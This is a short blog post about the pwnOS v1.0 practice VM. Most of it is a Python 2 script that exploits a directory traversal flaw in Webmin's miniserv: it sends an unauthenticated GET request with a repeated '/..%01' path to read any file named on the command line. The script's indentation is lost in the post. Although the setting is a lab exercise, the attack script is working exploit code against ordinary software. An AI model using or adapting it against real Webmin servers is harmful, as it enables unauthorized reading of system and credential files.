pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with the pwnOS v1.0 to be able to gain root.  One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem.  I liked the metasploit module but I found that I wanted a quicker script and something I could save the output with.  I then designed the following script using python:

#!/usr/bin/python

# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability.  This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit.  You can also redirect the output to a file.


import socket
import os, sys
import urllib

if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.11.151',10000))

        # Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]

httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
for i in range(1,15):
data = s.recv(1024)
print data

else:
print "Usage: ./displayFile.py file"
print "The file in this case is any file on the file system you can pull.\n\n"

Comments

Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

VBA - Script to Download a file from a URL

IoT Malware Analysis - CnC Server - Part 3